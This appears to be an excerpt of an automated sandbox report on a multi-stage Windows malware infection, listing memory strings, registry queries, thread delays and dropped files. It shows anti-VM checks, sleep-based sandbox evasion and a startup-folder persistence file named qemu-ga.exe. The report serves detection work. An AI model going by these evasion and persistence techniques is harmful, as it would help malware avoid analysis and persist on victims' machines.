Source: dialer.exe, 00000022.00000003.2750963859.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2704944546.000001B8F60CE000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2700493104.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2723023170.000001B8F60D3000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2713011554.000001B8F60CB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: MEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEREGSVCS.EXEC:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGSVCS.EXEINSTALLSETUP8.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\INSTALLSETUP8.EXEBROOMSETUP.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\BROOMSETUP.EXETUC4.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\TUC4.EXETUC4.TMPC:\USERS\user\APPDATA\LOCAL\TEMP\IS-5MF81.TMP\TUC4.TMPETOPT.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\ETOPT.EXETUC4.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\TUC4.EXETUC4.TMPC:\USERS\user\APPDATA\LOCAL\TEMP\IS-OKLT8.TMP\TUC4.TMPNSI4BEF.TMP.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\NSI4BEF.TMP.EXE5A58.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\5A58.EXEDIALER.EXEC:\WINDOWS\SYSTEM32\DIALER.EXE7D14.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\7D14.EXE9234.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\9234.EXEA203.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\A203.EXEABF7.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\ABF7.EXEVGHRJTAC:\USERS\user\APPDATA\ROAMING\VGHRJTAXQFUEYDABRJUHPTX.EXEC:\PROGRAMDATA\XQFUEYDABRJUHPTX.EXEDATAPUMPCRT.EXEC:\PROGRAM FILES (X86)\DATAPUMPCRT\DATAPUMPCRT.EXEQEMU-GA.EXEC:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\QEMU-GA.EXEWMIPRVSE.EXEXQFUEYDABRJUHPTX.EXEC:\PROGRAMDATA\XQ
Source: dialer.exe, 00000022.00000003.2676951813.000001B8F6BEA000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2664346245.000001B8F60EB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2700365073.000001B8F6BEB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2656550735.000001B8F6BA9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2674217780.000001B8F6BEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: XC:\USERS\user\APPDATA\ROAMING\MICROSOFT\WINDOWS\START MENU\PROGRAMS\STARTUP\QEMU-GA.EXE
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: TOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: dialer.exe, 00000022.00000003.2677582742.000001B8F60DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEQNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEC:\PROGRAM FILES (X86)\ZRLDTBAVCHHXNHJYFTZOBZESBDZJDLWLCDCFLQKQENFVJTNPARJORXZWFMSJSMCUMOOAAMEPTJXBDAO\QNMTWEVNNJOZGDKXOKCCVYQZOVJ.EXEREGSVCS.EXEC:\WINDOWS\MICROSOFT.NET\FRAMEWORK\V4.0.30319\REGSVCS.EXEINSTALLSETUP8.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\INSTALLSETUP8.EXEBROOMSETUP.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\BROOMSETUP.EXETUC4.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\TUC4.EXETUC4.TMPC:\USERS\user\APPDATA\LOCAL\TEMP\IS-5MF81.TMP\TUC4.TMPETOPT.EXEC:\USERS\user\APPDATA\LOCAL\TEMP\ETOPT.EXETUC4.EXEC:\USERS\user\APPDA
Source: W73PCbSH71.exe, 00000000.00000002.1688086315.0000000000520000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK!
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTART TASK: %WSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES

Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Users\user\AppData\Local\Temp\907.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3613.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3FF8.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\4BEF.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\617D.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1241	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1142	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 438	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 406	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 767	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 774	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\9234.exe	Window / User API: threadDelayed 835
Source: C:\Users\user\AppData\Local\Temp\A203.exe	Window / User API: threadDelayed 419

Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AR2HV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OEQUH.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-57NTO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-I6VL6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9EPE2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MTV1E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MRQQI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-J8ET1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MEVM4.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-M2T3E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8S45S.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\uchardet.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-0MOHV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MSLFL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DEI4I.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-IE8CS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AKKJ0.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-28DPF.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\7D14.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TCA78.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-V58DU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L2GUL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DFBO.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N7BK8.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-JS4C5.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QDL6V.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\sd.dll (copy)	Jump to dropped file
